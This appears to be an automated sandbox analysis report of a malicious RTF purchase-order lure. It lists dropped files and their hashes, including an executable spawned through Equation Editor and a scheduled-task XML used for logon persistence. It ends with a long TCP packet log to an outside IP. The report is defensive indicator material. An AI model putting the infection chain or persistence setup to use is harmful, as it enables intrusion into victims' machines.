                                                                              SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                              SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                              C:\Users\user\AppData\Local\Temp\tmp40B9.tmp
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1623
                                                                              Entropy (8bit):5.150162218405015
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36
                                                                              MD5:1848B4AEC2785B06DFAB71736CFCD778
                                                                              SHA1:CCF0A17A895F114FCF3B3B7FA166AA21ACC68B64
                                                                              SHA-256:09095E3D18205126167F420AD20F1AF178D384B32F0D72EB0A3441F50923E3E7
                                                                              SHA-512:B7AF56E8A0F6BA7354790E5D17353ABC93325A09FA430BFCF5CBC0B93FE45BAB21080C7077135DCC54D11FE81FAD9E4EC24B5CFC049C1544AF68DF61D22CC60B
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                              C:\Users\user\AppData\Roaming\DsVdJeRPpef.exe
                                                                              Process:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):734720
                                                                              Entropy (8bit):7.6904916579877
                                                                              Encrypted:false
                                                                              SSDEEP:12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
                                                                              MD5:CEDD3570A65CE74199167DA6E5190CC4
                                                                              SHA1:A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
                                                                              SHA-256:5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
                                                                              SHA-512:9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised Purchase Order 1214.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Mon Feb 8 17:27:39 2021, length=234075, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2198
                                                                              Entropy (8bit):4.569121824697969
                                                                              Encrypted:false
                                                                              SSDEEP:48:8RT/XTFGqeFluFQKQh2RT/XTFGqeFluFQKQ/:8RT/XJGqMaQKQh2RT/XJGqMaQKQ/
                                                                              MD5:91095A9FFC9D48E66067CA79DDAC8523
                                                                              SHA1:8A25628BBEF0338F607DD1734B8EFD0C47CAF5C6
                                                                              SHA-256:3152D3CC672A8ECE8A610A25A090438C57CB945A2EC56A49C2618320E96158E1
                                                                              SHA-512:69A9A2D6517B33E55432049BB9C4CB0ACA014FCF6E97EE315F3CE760475BB14A9C390218D2FD056244DFFCAD25FE3A2AF93A067E5F7B5E35DBD4DAA1618311F5
                                                                              Malicious:false
                                                                              Preview: L..................F.... ...~/...{..~/...{.../..H...[............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.[...HRt. .REVISE~1.DOC..l.......Q.y.Q.y*...8.....................R.e.v.i.s.e.d. .P.u.r.c.h.a.s.e. .O.r.d.e.r. .1.2.1.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Revised Purchase Order 1214.doc.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .P.u.r.c.h.a.s.e. .O.r.d.e.r. .1.2.1.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):119
                                                                              Entropy (8bit):4.609062540608823
                                                                              Encrypted:false
                                                                              SSDEEP:3:M1mQz94qCd5ovDz94qCd5omX1mQz94qCd5ov:M5CRkHCRfCRy
                                                                              MD5:C89A709DE8831715DB5E7567BC4AA5DD
                                                                              SHA1:FF47F40260EACB410ABEA621A133FF063ECE0056
                                                                              SHA-256:6D18B7E48FAB0DBE4AAFF0F945C3C1F9A034CB5A3FE6B241CF0A47976FB2F77D
                                                                              SHA-512:1D4F56A6BD0CB1AC08719118D12467BFFA687686B36A9190EBD80AA3D282A8C9B77BA9E420743A72B09ECAC70DD8BAC2B76B5CD80F4E39AF7610D7DE636709DA
                                                                              Malicious:false
                                                                              Preview: [doc]..Revised Purchase Order 1214.LNK=0..Revised Purchase Order 1214.LNK=0..[doc]..Revised Purchase Order 1214.LNK=0..
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                              MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                              SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                              SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                              SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview: ..
                                                                              C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):734720
                                                                              Entropy (8bit):7.6904916579877
                                                                              Encrypted:false
                                                                              SSDEEP:12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
                                                                              MD5:CEDD3570A65CE74199167DA6E5190CC4
                                                                              SHA1:A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
                                                                              SHA-256:5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
                                                                              SHA-512:9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
                                                                              Malicious:true
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.
                                                                              C:\Users\user\Desktop\~$vised Purchase Order 1214.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                              MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                              SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                              SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                              SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                              Static File Info

                                                                              General

                                                                              File type:Rich Text Format data, unknown version
                                                                              Entropy (8bit):4.00954560931993
                                                                              TrID:
                                                                              • Rich Text Format (5005/1) 55.56%
                                                                              • Rich Text Format (4004/1) 44.44%
                                                                              File name:Revised Purchase Order 1214.doc
                                                                              File size:234075
                                                                              MD5:4b6b36751c6b94190a4ffd8cf8859758
                                                                              SHA1:b1771187bcd8c9dc333b90131acd3a71e315c111
                                                                              SHA256:ea6269300a84f6764e771f3c560da1a639272149302d51a1e31bbee034691944
                                                                              SHA512:d5ec5702fb0ec57e5c0d9dec6906d6c3f147169f94f0e431c767444d64a356777350c1ace3a97addb73f89feae61b9bf64a1d3b9d32ee3538d93041fdc5566af
                                                                              SSDEEP:6144:ISPr3uZ/at5IWhizLKnsBSgLStnIfW0hRFE3rSeixfgbQy:7r3c/e5IWhi/KsMySlIfDFE3me+/y
                                                                              File Content Preview:{\rtf9620{\object256852 256852\objlink\objw6336\objh1549{\*\objdata919862 {\*\mcGpRule380022238.380022238\*\.380022238 \*\mcGpRule380022238.380022238\*

                                                                              File Icon

                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                              Static RTF Info

                                                                              Objects

                                                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                              00000005Fhno

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 8, 2021 10:28:18.433629036 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.638010025 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.638117075 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.638580084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.845052958 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852696896 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852761984 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852811098 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852861881 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852900028 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852940083 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852946997 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.852978945 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.852986097 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.852988958 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.853018045 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.853032112 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.853060007 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:18.853091002 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:18.853125095 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057574987 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057729959 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057781935 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057826996 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057846069 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057864904 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057878971 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057903051 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057905912 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057924032 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057940960 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057945967 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.057982922 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.057982922 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058018923 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058022976 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058060884 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058094025 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058108091 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058151007 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058151960 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058156967 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058188915 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058191061 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058228016 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058231115 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058264971 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058267117 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058303118 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058305979 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.058340073 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.058377028 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.264429092 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264573097 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264630079 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264674902 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264713049 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264719963 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.264751911 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.264756918 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.264794111 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.264827967 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.265043020 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.265094042 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.265120029 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.265137911 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.265151024 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.265188932 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.269750118 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469351053 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469439030 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469446898 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469489098 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469506025 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469516993 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469526052 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469546080 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469557047 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469574928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469588041 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469614029 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469641924 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469645977 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469659090 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469675064 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469696045 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469719887 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.469907999 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.469938040 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.470000029 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.470325947 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.470423937 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.474119902 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.474194050 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.674268961 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674325943 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674359083 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674396992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674446106 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674489021 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674529076 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674568892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674608946 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674648046 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.674676895 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.674740076 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.674756050 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.674762964 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.674767017 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.675775051 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.675818920 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.675883055 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.676018000 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879314899 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879396915 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879455090 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879494905 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879533052 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879581928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879620075 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879641056 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879671097 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879682064 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879688025 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879692078 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879697084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879700899 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879705906 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879715919 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879748106 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879756927 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879791975 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879796028 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879815102 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879834890 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.879923105 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.879940033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.880942106 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:19.881035089 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:19.882529974 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084197998 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084325075 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084376097 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084419012 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084456921 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084496021 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084536076 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084557056 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084577084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084594011 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084597111 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084647894 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.084650993 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084673882 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.084738970 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.086823940 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.086972952 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289125919 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289164066 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289202929 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289237022 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289271116 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289305925 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289308071 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289343119 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:20.289343119 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289350033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289355040 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289359093 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:20.289372921 CET4916780192.168.2.2243.252.37.193
